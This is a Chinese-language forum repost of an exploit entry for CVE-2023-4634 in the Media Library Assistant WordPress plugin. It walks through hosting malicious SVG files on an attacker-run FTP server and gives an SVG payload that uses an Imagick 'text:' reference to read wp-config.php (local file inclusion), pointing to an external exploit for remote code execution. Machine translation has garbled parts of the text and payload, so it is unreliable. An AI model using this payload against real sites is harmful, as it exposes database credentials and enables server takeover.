媒体库助理WordPress插件-RCE和LFI

[HackApt-37 Team已验证会员]

＃利用标题:媒体库助理WordPress插件-RCE和LFI
＃日期: 2023/09/05
＃CVE: CVE-2023-4634
＃漏洞作者: florent montel/pathowl.io/@pepitoh/twitter @pepito_oh
＃剥削路径: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
＃Exploit: https://github.com/patrowl/cve-2023-4634/
＃供应商homepage3360 https://fr.wordpress.org/plugins/media-library-assistant/
＃软件link: https://fr.wordpress.org/plugins/media-library-assistant/
＃版本: 3.10
＃测试在: 3.09
＃Description:
＃媒体库助理WordPress插件在版本3.10中受到对Imagick（）转换的远程引用的影响，该引用允许攻击者根据远程服务器上的Imagick配置执行LFI和RCE。受影响的页面IS: wp-content/plugins/Media-library-rassistant/incluct/mla-stream-image.php
#lfi
触发远程SVG转换的步骤
在FTP: //x.x.x.x:21创建远程FTP服务器（HTTP将不起作用，请参阅参考）
主机2个文件:

• 恶意
• 恶意[1]

PAYLOAD:
对于LFI，获得WP-Config.php:
远程ftp:上的恶意和恶意[1]
SVG宽度='500'高度='500'
xmlns:xlink='http://www.w3.org/1999/xlink'
XMLNS='http://www.w3.org/2000/svg'
图片Xlink:HRef='Text:/././wp-config.php'width='500'height='500'/
/svg
然后用:触发转换

正在加载...

127.0.0.1

＃目录清单或RCE:
为了获得目录清单甚至RCE，它更加复杂。
在这里使用可用的利用:

正在加载...

github.com

＃ 笔记
剥削将取决于策略。xmlImagick配置文件安装在远程服务器上。所有利用路径和脚本都使用默认的WordPress配置和安装执行（WordPress具有很大的机会具有默认的Imagick配置）。

 

H

铜矿画廊1.6.25 -RCE

H

Webigniter V28.7.23文件上传- 远程代码执行